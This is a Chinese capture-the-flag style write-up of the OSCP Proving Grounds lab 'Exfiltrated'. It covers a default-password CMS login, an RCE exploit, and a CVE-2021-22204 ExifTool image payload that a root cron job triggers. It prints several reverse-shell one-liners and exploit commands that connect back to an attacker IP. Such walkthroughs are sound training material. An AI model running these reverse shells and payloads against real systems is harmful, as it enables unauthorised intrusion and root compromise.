OSCP靶场63--Exfiltrated(pg)
文章描述了一次完整的攻击链过程,包括端口扫描、默认密码登录、利用CMS漏洞获取初始访问权限、通过exiftool工具本身的RCE漏洞生成带有反弹shell的图片,并最终利用CVE-2021-4034实现提权。 2025-10-30 01:31:6 Author: www.freebuf.com(查看原文) 阅读量:4 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击链

端口扫描---默认密码---CMS的RCE---以root权限运行的脚本---exiftool工具本身的漏洞---制造有反弹shell的图片

---运行linpeas.sh,利用CVE-2021-4034提权

知识点

CVE-2021-22204

CVE-2021-4034

难度

中等(我觉得)

过程

信息收集

只有俩端口

1761559309_68ff430d9c46b07dd8732.png!small?1761559308395

这个时候,22端口可能有用、没用。 但80端口一定有幺蛾子。

1761559648_68ff44609e5e5699d1f7c.png!small?1761559647959

我其实不知道这个是什么,但是大概率要绑定靶机IP,不然怎么访问。。

先只访问IP试一下,同时遍历

1761567141_68ff61a58b3ef289bf0ea.png!small?1761567140367

一个站点,看来突破点在80。遍历一下试试,

dirsearch -u http://exfiltrated.offsec/ -f -e php,txt,pdf,html

没啥东西。

突破边界

1761567546_68ff633a8914f7b239b25.png!small?1761567549352

找到CMS关键词,搜索一下对应漏洞

1761567848_68ff6468e5951c0926982.png!small?1761567847761

下载该EXP

尝试搜索默认密码

1761568138_68ff658a2635a4628daa4.png!small?1761568136618

登录成功了

1761568225_68ff65e11f7e125d70cd9.png!small?1761568224926

这就突破边界了

1761568398_68ff668ebf5e5864aa8f5.png!small?1761568397374

提权(3种)

1761568741_68ff67e5b7f3279e2c3c1.png!small?1761568740400

---》bash受限

我用以下命令连接不回去

nc -e 192.168.49.53 4444

rm /tmp/f; mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1 | nc 192.168.49.53 4444 > /tmp/f

/bin/bash -c 'bash -i >& /dev/tcp/192.168.49.53/4444 0>&1'

我其实不理解。。。最后用这个连接上的。

/usr/bin/python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.49.53",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

1761569101_68ff694d1cf8969b439b5.png!small?1761569099619

上传linpeas,寻找提权信息。我其实没找到linpeas输出结果里的哪个部分是定时任务。但这里增加定时计划任务为信息收集点。

有个定时任务是这样的:
* * * * * root bash /opt/image-exif.sh

exiftools本身有RCE,再执行有反弹shell的文件。

总之,到这里,无非就是生成有反弹shell的图片,以下有两种生成方式:

exiftool

exiftool -config eval.config runme.jpg -eval='system("/bin/bash -c \"bash -i >& /dev/tcp/192.168.49.58/4445 0>&1\"")'

1761742404_69020e446c15719d7be5a.png!small?1761742405152

验证一下,是否写入:

1761742849_690210015f1d922432c84.png!small?1761742863228

此处并无显示,我看其他wp会验证是否写入,其对应的Copyright字段会以base64的存储payload的eval字段:

通过wget把该图片下载到脚本中的目录,并监听4445端口。

1761743807_690213bf7a446d5adba58.png!small?1761743816395

但确实成功了。

1761742481_69020e91609ad11cc3861.png!small?1761742482168

参考链接:

Proving Grounds Practice-Exfiltrated | CN-SEC 中文网

https://github.com/OneSecCyber/JPEG_RCE

直接用脚本

脚本地址如下:

UNICORDev/exploit-CVE-2021-22204: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution

生成有反弹shell的图片

python3 exploit-CVE-2021-22204.py -c 'rm /tmp/f; mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1 | nc 192.168.49.58 4445 > /tmp/f'

上传,并执行

1761746011_69021c5bc68980593399a.png!small?1761746012507

得到结果。

1761746023_69021c67738eb3025a6d9.png!small?1761746024060

CVE-2021-4034.py

没写的部分是freebuf没保存,,不是我没写, 破网站!

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/system/454891.html
如有侵权请联系:admin#unsafe.sh